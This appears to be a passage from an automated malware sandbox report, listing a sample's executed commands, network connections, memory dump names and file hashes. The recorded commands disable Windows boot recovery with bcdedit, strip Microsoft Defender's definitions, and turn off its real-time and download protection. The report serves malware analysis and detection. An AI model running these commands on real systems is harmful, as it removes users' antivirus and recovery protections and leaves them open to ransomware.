C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.30:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
memory/1872-115-0x0000000000000000-mapping.dmp
memory/1284-116-0x0000000000000000-mapping.dmp
memory/3024-117-0x0000000000000000-mapping.dmp
memory/2784-118-0x0000000000000000-mapping.dmp
memory/3904-119-0x0000000000000000-mapping.dmp
memory/2756-120-0x0000000000000000-mapping.dmp
memory/3944-121-0x0000000000000000-mapping.dmp
memory/2760-122-0x0000000000000000-mapping.dmp
memory/1444-123-0x0000000000000000-mapping.dmp
memory/512-124-0x0000000000000000-mapping.dmp
memory/1504-125-0x0000000000000000-mapping.dmp
memory/3304-126-0x0000000000000000-mapping.dmp
memory/516-127-0x0000000000000000-mapping.dmp
memory/776-128-0x0000000000000000-mapping.dmp
memory/1328-129-0x0000000000000000-mapping.dmp
memory/324-130-0x0000000000000000-mapping.dmp
memory/3876-131-0x0000000000000000-mapping.dmp
memory/404-132-0x0000000000000000-mapping.dmp
memory/604-133-0x0000000000000000-mapping.dmp
memory/712-134-0x0000000000000000-mapping.dmp
memory/2864-135-0x0000000000000000-mapping.dmp
memory/996-136-0x0000000000000000-mapping.dmp
memory/2096-137-0x0000000000000000-mapping.dmp
memory/1316-138-0x0000000000000000-mapping.dmp
memory/1396-139-0x0000000000000000-mapping.dmp
memory/1756-140-0x0000000000000000-mapping.dmp
memory/3932-141-0x0000000000000000-mapping.dmp
memory/1900-142-0x0000000000000000-mapping.dmp
memory/1824-143-0x0000000000000000-mapping.dmp
memory/2392-144-0x0000000000000000-mapping.dmp
memory/3652-145-0x0000000000000000-mapping.dmp
memory/3264-146-0x0000000000000000-mapping.dmp
memory/1920-147-0x0000000000000000-mapping.dmp
memory/1876-148-0x0000000000000000-mapping.dmp
memory/3564-149-0x0000000000000000-mapping.dmp
memory/3152-150-0x0000000000000000-mapping.dmp
memory/2160-151-0x0000000000000000-mapping.dmp
memory/3916-152-0x0000000000000000-mapping.dmp
memory/3628-153-0x0000000000000000-mapping.dmp
memory/3440-154-0x0000000000000000-mapping.dmp
memory/1804-155-0x0000000000000000-mapping.dmp
memory/2724-156-0x0000000000000000-mapping.dmp
memory/3004-157-0x0000000000000000-mapping.dmp
memory/1436-158-0x0000000000000000-mapping.dmp
memory/3164-159-0x0000000000000000-mapping.dmp
memory/3136-160-0x0000000000000000-mapping.dmp
memory/3204-161-0x0000000000000000-mapping.dmp
memory/2792-162-0x0000000000000000-mapping.dmp
memory/2704-163-0x0000000000000000-mapping.dmp
memory/1084-164-0x0000000000000000-mapping.dmp
memory/3432-165-0x0000000000000000-mapping.dmp
memory/376-166-0x0000000000000000-mapping.dmp
memory/824-167-0x0000000000000000-mapping.dmp
memory/1064-168-0x0000000000000000-mapping.dmp
memory/3508-169-0x0000000000000000-mapping.dmp
memory/1452-170-0x0000000000000000-mapping.dmp
memory/1740-171-0x0000000000000000-mapping.dmp
memory/1912-172-0x0000000000000000-mapping.dmp
memory/3224-173-0x0000000000000000-mapping.dmp
memory/3000-174-0x0000000000000000-mapping.dmp
memory/2380-175-0x0000000000000000-mapping.dmp
memory/1420-176-0x0000000000000000-mapping.dmp
memory/2056-177-0x0000000000000000-mapping.dmp
memory/3180-178-0x0000000000000000-mapping.dmp
memory/1656-180-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-179-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-181-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-182-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-183-0x000001BBF72B0000-0x000001BBF72B2000-memory.dmp
memory/1656-185-0x000001BBF72B3000-0x000001BBF72B5000-memory.dmp
memory/1656-184-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-186-0x000001BBF7C50000-0x000001BBF7C72000-memory.dmp
memory/1656-187-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-188-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-189-0x000001BBF7E00000-0x000001BBF7E76000-memory.dmp
memory/1656-190-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-194-0x000001BBF72B6000-0x000001BBF72B8000-memory.dmp
memory/1656-195-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-196-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1656-216-0x000001BBDEC50000-0x000001BBDEC52000-memory.dmp
memory/1916-218-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/1916-219-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-220-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-221-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-222-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-223-0x00000152760C0000-0x00000152760E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef4053e33705196e46e1aa68eee4917a |
| SHA1 | f03851f8bff4cc626259d86dd195da0dd2f5e598 |
| SHA256 | 0e3a0fddcc6bd3a000f00628a0f1e52a87058f293b56fbfa6bcd6da6a5f6c2a4 |
| SHA512 | 758e3cec41382b6c2cadc2a45ee549ad3b331e0c353f4128e8faefa538eb2e3300dbaeca209f735e4d4b9ec4ce64f676daff36a9a88d7d482beb33f328d3e1b8 |
memory/1916-226-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-227-0x0000015276120000-0x0000015276122000-memory.dmp
memory/1656-225-0x000001BBF72B8000-0x000001BBF72B9000-memory.dmp
memory/1916-229-0x0000015276123000-0x0000015276125000-memory.dmp
memory/1916-228-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-230-0x0000015276B40000-0x0000015276BB6000-memory.dmp
memory/1916-231-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-235-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-236-0x000001525BFE0000-0x000001525BFE2000-memory.dmp
memory/1916-256-0x0000015276126000-0x0000015276128000-memory.dmp
memory/1916-258-0x0000015276128000-0x0000015276129000-memory.dmp